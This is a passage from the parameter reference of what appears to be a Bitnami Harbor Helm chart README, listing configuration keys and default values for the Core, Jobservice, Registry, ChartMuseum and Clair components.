| `core.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `core.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `core.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `core.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `core.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `core.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `core.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `core.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `core.resources.limits` | The resources limits for the Harbor Core containers | `{}` |
| `core.resources.requests` | The requested resources for the Harbor Core containers | `{}` |
| `core.podSecurityContext.enabled` | Enabled Harbor Core pods' Security Context | `true` |
| `core.podSecurityContext.fsGroup` | Set Harbor Core pod's Security Context fsGroup | `1001` |
| `core.containerSecurityContext.enabled` | Enabled Harbor Core containers' Security Context | `true` |
| `core.containerSecurityContext.runAsUser` | Set Harbor Core containers' Security Context runAsUser | `1001` |
| `core.containerSecurityContext.runAsNonRoot` | Set Harbor Core containers' Security Context runAsNonRoot | `true` |
| `core.updateStrategy.type` | Harbor Core deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `core.updateStrategy.rollingUpdate` | Harbor Core deployment rolling update configuration parameters | `{}` |
| `core.lifecycleHooks` | LifecycleHook for the Harbor Core container(s) to automate configuration before or after startup | `{}` |
| `core.hostAliases` | Harbor Core pods host aliases | `[]` |
| `core.podLabels` | Add additional labels to the Harbor Core pods (evaluated as a template) | `{}` |
| `core.podAnnotations` | Annotations to add to the Harbor Core pods (evaluated as a template) | `{}` |
| `core.podAffinityPreset` | Harbor Core Pod affinity preset. Ignored if `core.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `core.podAntiAffinityPreset` | Harbor Core Pod anti-affinity preset. Ignored if `core.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `core.nodeAffinityPreset.type` | Harbor Core Node affinity preset type. Ignored if `core.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `core.nodeAffinityPreset.key` | Harbor Core Node label key to match Ignored if `core.affinity` is set. | `""` |
| `core.nodeAffinityPreset.values` | Harbor Core Node label values to match. Ignored if `core.affinity` is set. | `[]` |
| `core.affinity` | Harbor Core Affinity for pod assignment | `{}` |
| `core.nodeSelector` | Harbor Core Node labels for pod assignment | `{}` |
| `core.tolerations` | Harbor Core Tolerations for pod assignment | `[]` |
| `core.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `core.priorityClassName` | Priority Class Name | `""` |
| `core.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `core.sidecars` | Add additional sidecar containers to the Harbor Core pods | `[]` |
| `core.initContainers` | Add additional init containers to the Harbor Core pods | `[]` |
| `core.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Core pods | `[]` |
| `core.extraVolumes` | Optionally specify extra list of additional volumes for the Harbor Core pods | `[]` |
| `core.automountServiceAccountToken` | Automount service account token | `false` |
| `core.service.ports.http` | Harbor Core HTTP service port | `80` |
| `core.service.ports.https` | Harbor Core HTTPS service port | `443` |
| `core.service.ports.metrics` | Harbor Core metrics service port | `8001` |
### Harbor Jobservice Parameters
| Name | Description | Value |
| -------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------ |
| `jobservice.image.registry` | Harbor Jobservice image registry | `docker.io` |
| `jobservice.image.repository` | Harbor Jobservice image repository | `bitnami/harbor-jobservice` |
| `jobservice.image.tag` | Harbor Jobservice image tag (immutable tags are recommended) | `2.4.2-debian-10-r2` |
| `jobservice.image.pullPolicy` | Harbor Jobservice image pull policy | `IfNotPresent` |
| `jobservice.image.pullSecrets` | Harbor Jobservice image pull secrets | `[]` |
| `jobservice.image.debug` | Enable Harbor Jobservice image debug mode | `false` |
| `jobservice.maxJobWorkers` | The max job workers | `10` |
| `jobservice.redisNamespace` | Redis namespace for jobservice | `harbor_job_service_namespace` |
| `jobservice.jobLogger` | The logger for jobs: `file`, `database` or `stdout` | `file` |
| `jobservice.secret` | Secret used when the job service communicates with other components. If a secret key is not specified, Helm will generate one. Must be a string of 16 chars. | `""` |
| `jobservice.tls.existingSecret` | Name of an existing secret with the certificates for internal TLS access | `""` |
| `jobservice.command` | Override default container command (useful when using custom images) | `[]` |
| `jobservice.args` | Override default container args (useful when using custom images) | `[]` |
| `jobservice.extraEnvVars` | Array with extra environment variables to add Harbor Jobservice pods | `[]` |
| `jobservice.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Jobservice pods | `""` |
| `jobservice.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Jobservice pods | `""` |
| `jobservice.containerPorts.http` | Harbor Jobservice HTTP container port | `8080` |
| `jobservice.containerPorts.https` | Harbor Jobservice HTTPS container port | `8443` |
| `jobservice.containerPorts.metrics` | Harbor Jobservice metrics container port | `8001` |
| `jobservice.replicaCount` | Number of Harbor Jobservice replicas | `1` |
| `jobservice.livenessProbe.enabled` | Enable livenessProbe on Harbor Jobservice containers | `true` |
| `jobservice.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `jobservice.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `jobservice.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `jobservice.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `jobservice.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `jobservice.readinessProbe.enabled` | Enable readinessProbe on Harbor Jobservice containers | `true` |
| `jobservice.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `jobservice.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `jobservice.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `jobservice.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `jobservice.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `jobservice.startupProbe.enabled` | Enable startupProbe on Harbor Jobservice containers | `false` |
| `jobservice.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `jobservice.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `jobservice.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `jobservice.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `jobservice.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `jobservice.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `jobservice.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `jobservice.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `jobservice.resources.limits` | The resources limits for the Harbor Jobservice containers | `{}` |
| `jobservice.resources.requests` | The requested resources for the Harbor Jobservice containers | `{}` |
| `jobservice.podSecurityContext.enabled` | Enabled Harbor Jobservice pods' Security Context | `true` |
| `jobservice.podSecurityContext.fsGroup` | Set Harbor Jobservice pod's Security Context fsGroup | `1001` |
| `jobservice.containerSecurityContext.enabled` | Enabled Harbor Jobservice containers' Security Context | `true` |
| `jobservice.containerSecurityContext.runAsUser` | Set Harbor Jobservice containers' Security Context runAsUser | `1001` |
| `jobservice.containerSecurityContext.runAsNonRoot` | Set Harbor Jobservice containers' Security Context runAsNonRoot | `true` |
| `jobservice.updateStrategy.type` | Harbor Jobservice deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `jobservice.updateStrategy.rollingUpdate` | Harbor Jobservice deployment rolling update configuration parameters | `{}` |
| `jobservice.lifecycleHooks` | LifecycleHook for the Harbor Jobservice container(s) to automate configuration before or after startup | `{}` |
| `jobservice.hostAliases` | Harbor Jobservice pods host aliases | `[]` |
| `jobservice.podLabels` | Add additional labels to the Harbor Jobservice pods (evaluated as a template) | `{}` |
| `jobservice.podAnnotations` | Annotations to add to the Harbor Jobservice pods (evaluated as a template) | `{}` |
| `jobservice.podAffinityPreset` | Harbor Jobservice Pod affinity preset. Ignored if `jobservice.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `jobservice.podAntiAffinityPreset` | Harbor Jobservice Pod anti-affinity preset. Ignored if `jobservice.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `jobservice.nodeAffinityPreset.type` | Harbor Jobservice Node affinity preset type. Ignored if `jobservice.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `jobservice.nodeAffinityPreset.key` | Harbor Jobservice Node label key to match Ignored if `jobservice.affinity` is set. | `""` |
| `jobservice.nodeAffinityPreset.values` | Harbor Jobservice Node label values to match. Ignored if `jobservice.affinity` is set. | `[]` |
| `jobservice.affinity` | Harbor Jobservice Affinity for pod assignment | `{}` |
| `jobservice.nodeSelector` | Harbor Jobservice Node labels for pod assignment | `{}` |
| `jobservice.tolerations` | Harbor Jobservice Tolerations for pod assignment | `[]` |
| `jobservice.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `jobservice.priorityClassName` | Priority Class Name | `""` |
| `jobservice.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `jobservice.sidecars` | Add additional sidecar containers to the Harbor Jobservice pods | `[]` |
| `jobservice.initContainers` | Add additional init containers to the Harbor Jobservice pods | `[]` |
| `jobservice.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Jobservice pods | `[]` |
| `jobservice.extraVolumes` | Optionally specify extra list of additional volumes for the Harbor Jobservice pods | `[]` |
| `jobservice.automountServiceAccountToken` | Automount service account token | `false` |
| `jobservice.service.ports.http` | Harbor Jobservice HTTP service port | `80` |
| `jobservice.service.ports.https` | Harbor Jobservice HTTPS service port | `443` |
| `jobservice.service.ports.metrics` | Harbor Jobservice HTTPS service port | `8001` |
### Harbor Registry Parameters
| Name | Description | Value |
| ----------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------- |
| `registry.secret` | Secret is used to secure the upload state from client and registry storage backend. See: https://github.com/docker/distribution/blob/master/docs/configuration.md | `""` |
| `registry.relativeurls` | Make the registry return relative URLs in Location headers. The client is responsible for resolving the correct URL. | `false` |
| `registry.credentials.username` | The username for accessing the registry instance, which is hosted by htpasswd auth mode. More details see [official docs](https://github.com/docker/distribution/blob/master/docs/configuration.md#htpasswd) | `harbor_registry_user` |
| `registry.credentials.password` | The password for accessing the registry instance, which is hosted by htpasswd auth mode. More details see [official docs](https://github.com/docker/distribution/blob/master/docs/configuration.md#htpasswd). It is suggested you update this value before installation. | `harbor_registry_password` |
| `registry.credentials.htpasswd` | The content of htpasswd file based on the value of `registry.credentials.username` `registry.credentials.password`. Currently `helm` does not support bcrypt in the template script, if the credential is updated you need to manually generated by calling | `harbor_registry_user:$2y$10$9L4Tc0DJbFFMB6RdSCunrOpTHdwhid4ktBJmLD00bYgqkkGOvll3m` |
| `registry.middleware.enabled` | Middleware is used to add support for a CDN between backend storage and `docker pull` recipient. See | `false` |
| `registry.middleware.type` | CDN type for the middleware | `cloudFront` |
| `registry.middleware.cloudFront.baseurl` | CloudFront CDN settings: Base URL | `example.cloudfront.net` |
| `registry.middleware.cloudFront.keypairid` | CloudFront CDN settings: Keypair ID | `KEYPAIRID` |
| `registry.middleware.cloudFront.duration` | CloudFront CDN settings: Duration | `3000s` |
| `registry.middleware.cloudFront.ipfilteredby` | CloudFront CDN settings: IP filters | `none` |
| `registry.middleware.cloudFront.privateKeySecret` | CloudFront CDN settings: Secret name with the private key | `my-secret` |
| `registry.tls.existingSecret` | Name of an existing secret with the certificates for internal TLS access | `""` |
| `registry.replicaCount` | Number of Harbor Registry replicas | `1` |
| `registry.podSecurityContext.enabled` | Enabled Harbor Registry pods' Security Context | `true` |
| `registry.podSecurityContext.fsGroup` | Set Harbor Registry pod's Security Context fsGroup | `1001` |
| `registry.updateStrategy.type` | Harbor Registry deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `registry.updateStrategy.rollingUpdate` | Harbor Registry deployment rolling update configuration parameters | `{}` |
| `registry.hostAliases` | Harbor Registry pods host aliases | `[]` |
| `registry.podLabels` | Add additional labels to the Harbor Registry pods (evaluated as a template) | `{}` |
| `registry.podAnnotations` | Annotations to add to the Harbor Registry pods (evaluated as a template) | `{}` |
| `registry.podAffinityPreset` | Harbor Registry Pod affinity preset. Ignored if `registry.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `registry.podAntiAffinityPreset` | Harbor Registry Pod anti-affinity preset. Ignored if `registry.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `registry.nodeAffinityPreset.type` | Harbor Registry Node affinity preset type. Ignored if `registry.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `registry.nodeAffinityPreset.key` | Harbor Registry Node label key to match Ignored if `registry.affinity` is set. | `""` |
| `registry.nodeAffinityPreset.values` | Harbor Registry Node label values to match. Ignored if `registry.affinity` is set. | `[]` |
| `registry.affinity` | Harbor Registry Affinity for pod assignment | `{}` |
| `registry.nodeSelector` | Harbor Registry Node labels for pod assignment | `{}` |
| `registry.tolerations` | Harbor Registry Tolerations for pod assignment | `[]` |
| `registry.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `registry.priorityClassName` | Priority Class Name | `""` |
| `registry.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `registry.sidecars` | Add additional sidecar containers to the Harbor Registry pods | `[]` |
| `registry.initContainers` | Add additional init containers to the Harbor Registry pods | `[]` |
| `registry.extraVolumes` | Optionally specify extra list of additional volumes for the Harbor Registry pods | `[]` |
| `registry.automountServiceAccountToken` | Automount service account token | `false` |
| `registry.server.image.registry` | Harbor Registry image registry | `docker.io` |
| `registry.server.image.repository` | Harbor Registry image repository | `bitnami/harbor-registry` |
| `registry.server.image.tag` | Harbor Registry image tag (immutable tags are recommended) | `2.4.2-debian-10-r2` |
| `registry.server.image.pullPolicy` | Harbor Registry image pull policy | `IfNotPresent` |
| `registry.server.image.pullSecrets` | Harbor Registry image pull secrets | `[]` |
| `registry.server.image.debug` | Enable Harbor Registry image debug mode | `false` |
| `registry.server.command` | Override default container command (useful when using custom images) | `[]` |
| `registry.server.args` | Override default container args (useful when using custom images) | `[]` |
| `registry.server.extraEnvVars` | Array with extra environment variables to add Harbor Registry main containers | `[]` |
| `registry.server.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Registry main containers | `""` |
| `registry.server.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Registry main containers | `""` |
| `registry.server.containerPorts.http` | Harbor Registry HTTP container port | `5000` |
| `registry.server.containerPorts.https` | Harbor Registry HTTPS container port | `5443` |
| `registry.server.containerPorts.debug` | Harbor Registry debug container port | `5001` |
| `registry.server.containerPorts.metrics` | Harbor Registry metrics container port | `8001` |
| `registry.server.livenessProbe.enabled` | Enable livenessProbe on Harbor Registry main containers | `true` |
| `registry.server.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `registry.server.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `registry.server.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `registry.server.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `registry.server.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `registry.server.readinessProbe.enabled` | Enable readinessProbe on Harbor Registry main containers | `true` |
| `registry.server.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `registry.server.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `registry.server.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `registry.server.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `registry.server.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `registry.server.startupProbe.enabled` | Enable startupProbe on Harbor Registry main containers | `false` |
| `registry.server.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `registry.server.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `registry.server.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `registry.server.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `registry.server.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `registry.server.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `registry.server.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `registry.server.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `registry.server.resources.limits` | The resources limits for the Harbor Registry main containers | `{}` |
| `registry.server.resources.requests` | The requested resources for the Harbor Registry main containers | `{}` |
| `registry.server.containerSecurityContext.enabled` | Enabled Harbor Registry main containers' Security Context | `true` |
| `registry.server.containerSecurityContext.runAsUser` | Set Harbor Registry main containers' Security Context runAsUser | `1001` |
| `registry.server.containerSecurityContext.runAsNonRoot` | Set Harbor Registry main containers' Security Context runAsNonRoot | `true` |
| `registry.server.lifecycleHooks` | LifecycleHook for the Harbor Registry main container(s) to automate configuration before or after startup | `{}` |
| `registry.server.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Registry main pods | `[]` |
| `registry.server.service.ports.http` | Harbor Registry HTTP service port | `5000` |
| `registry.server.service.ports.https` | Harbor Registry HTTPS service port | `5443` |
| `registry.server.service.ports.metrics` | Harbor Registry metrics service port | `8001` |
| `registry.controller.image.registry` | Harbor Registryctl image registry | `docker.io` |
| `registry.controller.image.repository` | Harbor Registryctl image repository | `bitnami/harbor-registryctl` |
| `registry.controller.image.tag` | Harbor Registryctl image tag (immutable tags are recommended) | `2.4.2-debian-10-r2` |
| `registry.controller.image.pullPolicy` | Harbor Registryctl image pull policy | `IfNotPresent` |
| `registry.controller.image.pullSecrets` | Harbor Registryctl image pull secrets | `[]` |
| `registry.controller.image.debug` | Enable Harbor Registryctl image debug mode | `false` |
| `registry.controller.command` | Override default container command (useful when using custom images) | `[]` |
| `registry.controller.args` | Override default container args (useful when using custom images) | `[]` |
| `registry.controller.extraEnvVars` | Array with extra environment variables to add Harbor Registryctl containers | `[]` |
| `registry.controller.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Registryctl containers | `""` |
| `registry.controller.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Registryctl containers | `""` |
| `registry.controller.containerPorts.http` | Harbor Registryctl HTTP container port | `8080` |
| `registry.controller.containerPorts.https` | Harbor Registryctl HTTPS container port | `8443` |
| `registry.controller.livenessProbe.enabled` | Enable livenessProbe on Harbor Registryctl containers | `true` |
| `registry.controller.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `registry.controller.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `registry.controller.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `registry.controller.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `registry.controller.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `registry.controller.readinessProbe.enabled` | Enable readinessProbe on Harbor Registryctl containers | `true` |
| `registry.controller.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `registry.controller.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `registry.controller.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `registry.controller.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `registry.controller.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `registry.controller.startupProbe.enabled` | Enable startupProbe on Harbor Registryctl containers | `false` |
| `registry.controller.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `registry.controller.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `registry.controller.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `registry.controller.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `registry.controller.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `registry.controller.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `registry.controller.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `registry.controller.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `registry.controller.resources.limits` | The resources limits for the Harbor Registryctl containers | `{}` |
| `registry.controller.resources.requests` | The requested resources for the Harbor Registryctl containers | `{}` |
| `registry.controller.containerSecurityContext.enabled` | Enabled Harbor Registryctl containers' Security Context | `true` |
| `registry.controller.containerSecurityContext.runAsUser` | Set Harbor Registryctl containers' Security Context runAsUser | `1001` |
| `registry.controller.containerSecurityContext.runAsNonRoot` | Set Harbor Registryctl containers' Security Context runAsNonRoot | `true` |
| `registry.controller.lifecycleHooks` | LifecycleHook for the Harbor Registryctl container(s) to automate configuration before or after startup | `{}` |
| `registry.controller.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Registryctl pods | `[]` |
| `registry.controller.service.ports.http` | Harbor Registryctl HTTP service port | `8080` |
| `registry.controller.service.ports.https` | Harbor Registryctl HTTPS service port | `8443` |
### ChartMuseum Parameters
| Name | Description | Value |
| --------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------ | ---------------------- |
| `chartmuseum.image.registry` | ChartMuseum image registry | `docker.io` |
| `chartmuseum.image.repository` | ChartMuseum image repository | `bitnami/chartmuseum` |
| `chartmuseum.image.tag` | ChartMuseum image tag (immutable tags are recommended) | `0.14.0-debian-10-r45` |
| `chartmuseum.image.pullPolicy` | ChartMuseum image pull policy | `IfNotPresent` |
| `chartmuseum.image.pullSecrets` | ChartMuseum image pull secrets | `[]` |
| `chartmuseum.image.debug` | Enable ChartMuseum image debug mode | `false` |
| `chartmuseum.enabled` | Enable ChartMuseum | `true` |
| `chartmuseum.useRedisCache` | Specify if ChartMuseum will use redis cache | `true` |
| `chartmuseum.absoluteUrl` | Specify an absolute URL for ChartMuseum registry | `false` |
| `chartmuseum.chartRepoName` | Specify the endpoint for the chartmuseum registry. Only applicable if `chartmuseum.absoluteUrl` is `true` | `chartsRepo` |
| `chartmuseum.depth` | Support for multitenancy. More info [here](https://chartmuseum.com/docs/#multitenancy) | `1` |
| `chartmuseum.logJson` | Print logs on JSON format | `false` |
| `chartmuseum.disableMetrics` | Disable prometheus metrics exposure | `false` |
| `chartmuseum.disableApi` | Disable all the routes prefixed with `/api` | `false` |
| `chartmuseum.disableStatefiles` | Disable use of index-cache.yaml | `false` |
| `chartmuseum.allowOverwrite` | Allow chart versions to be re-uploaded without force querystring | `true` |
| `chartmuseum.anonymousGet` | Allow anonymous GET operations | `false` |
| `chartmuseum.contextPath` | Set the base context path for ChartMuseum | `""` |
| `chartmuseum.indexLimit` | Limit the number of parallels indexes for ChartMuseum | `""` |
| `chartmuseum.chartPostFormFieldName` | Form field which will be queried for the chart file content | `""` |
| `chartmuseum.provPostFormFieldName` | Form field which will be queried for the provenance file content | `""` |
| `chartmuseum.maxStorageObjects` | Maximum storage objects | `""` |
| `chartmuseum.maxUploadSize` | Maximum upload size | `""` |
| `chartmuseum.storageTimestampTolerance` | Timestamp tolerance size | `1s` |
| `chartmuseum.tls.existingSecret` | Name of an existing secret with the certificates for internal TLS access | `""` |
| `chartmuseum.command` | Override default container command (useful when using custom images) | `[]` |
| `chartmuseum.args` | Override default container args (useful when using custom images) | `[]` |
| `chartmuseum.extraEnvVars` | Array with extra environment variables to add Chartmuseum pods | `[]` |
| `chartmuseum.extraEnvVarsCM` | ConfigMap containing extra environment variables for Chartmuseum pods | `""` |
| `chartmuseum.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Chartmuseum pods | `""` |
| `chartmuseum.containerPorts.http` | Chartmuseum HTTP container port | `9999` |
| `chartmuseum.containerPorts.https` | Chartmuseum HTTPS container port | `9443` |
| `chartmuseum.replicaCount` | Number of Chartmuseum replicas | `1` |
| `chartmuseum.livenessProbe.enabled` | Enable livenessProbe on Chartmuseum containers | `true` |
| `chartmuseum.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `chartmuseum.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `chartmuseum.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `chartmuseum.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `chartmuseum.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `chartmuseum.readinessProbe.enabled` | Enable readinessProbe on Chartmuseum containers | `true` |
| `chartmuseum.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `chartmuseum.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `chartmuseum.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `chartmuseum.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `chartmuseum.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `chartmuseum.startupProbe.enabled` | Enable startupProbe on Chartmuseum containers | `false` |
| `chartmuseum.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `chartmuseum.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `chartmuseum.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `chartmuseum.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `chartmuseum.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `chartmuseum.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `chartmuseum.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `chartmuseum.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `chartmuseum.resources.limits` | The resources limits for the Chartmuseum containers | `{}` |
| `chartmuseum.resources.requests` | The requested resources for the Chartmuseum containers | `{}` |
| `chartmuseum.podSecurityContext.enabled` | Enabled Chartmuseum pods' Security Context | `true` |
| `chartmuseum.podSecurityContext.fsGroup` | Set Chartmuseum pod's Security Context fsGroup | `1001` |
| `chartmuseum.containerSecurityContext.enabled` | Enabled Chartmuseum containers' Security Context | `true` |
| `chartmuseum.containerSecurityContext.runAsUser` | Set Chartmuseum containers' Security Context runAsUser | `1001` |
| `chartmuseum.containerSecurityContext.runAsNonRoot` | Set Chartmuseum containers' Security Context runAsNonRoot | `true` |
| `chartmuseum.updateStrategy.type` | Chartmuseum deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `chartmuseum.updateStrategy.rollingUpdate` | Chartmuseum deployment rolling update configuration parameters | `{}` |
| `chartmuseum.lifecycleHooks` | LifecycleHook for the Chartmuseum container(s) to automate configuration before or after startup | `{}` |
| `chartmuseum.hostAliases` | Chartmuseum pods host aliases | `[]` |
| `chartmuseum.podLabels` | Add additional labels to the Chartmuseum pods (evaluated as a template) | `{}` |
| `chartmuseum.podAnnotations` | Annotations to add to the Chartmuseum pods (evaluated as a template) | `{}` |
| `chartmuseum.podAffinityPreset` | Chartmuseum Pod affinity preset. Ignored if `chartmuseum.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `chartmuseum.podAntiAffinityPreset` | Chartmuseum Pod anti-affinity preset. Ignored if `chartmuseum.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `chartmuseum.nodeAffinityPreset.type` | Chartmuseum Node affinity preset type. Ignored if `chartmuseum.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `chartmuseum.nodeAffinityPreset.key` | Chartmuseum Node label key to match Ignored if `chartmuseum.affinity` is set. | `""` |
| `chartmuseum.nodeAffinityPreset.values` | Chartmuseum Node label values to match. Ignored if `chartmuseum.affinity` is set. | `[]` |
| `chartmuseum.affinity` | Chartmuseum Affinity for pod assignment | `{}` |
| `chartmuseum.nodeSelector` | Chartmuseum Node labels for pod assignment | `{}` |
| `chartmuseum.tolerations` | Chartmuseum Tolerations for pod assignment | `[]` |
| `chartmuseum.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `chartmuseum.priorityClassName` | Priority Class Name | `""` |
| `chartmuseum.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `chartmuseum.sidecars` | Add additional sidecar containers to the Chartmuseum pods | `[]` |
| `chartmuseum.initContainers` | Add additional init containers to the Chartmuseum pods | `[]` |
| `chartmuseum.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Chartmuseum pods | `[]` |
| `chartmuseum.extraVolumes` | Optionally specify extra list of additional volumes for the Chartmuseum pods | `[]` |
| `chartmuseum.automountServiceAccountToken` | Automount service account token | `false` |
| `chartmuseum.service.ports.http` | Chartmuseum HTTP service port | `80` |
| `chartmuseum.service.ports.https` | Chartmuseum HTTPS service port | `443` |
### Clair Parameters
| Name | Description | Value |
| ----------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------ |
| `clair.enabled` | Enable Clair scanner. Add it as an additional interrogation service by following https://goharbor.io/docs/latest/administration/vulnerability-scanning/pluggable-scanners | `false` |
| `clair.httpProxy` | The http proxy used to update vulnerabilities database from internet | `""` |
| `clair.httpsProxy` | The https proxy used to update vulnerabilities database from internet | `""` |
| `clair.updatersInterval` | The interval of clair updaters (hours), set to 0 to disable | `12` |
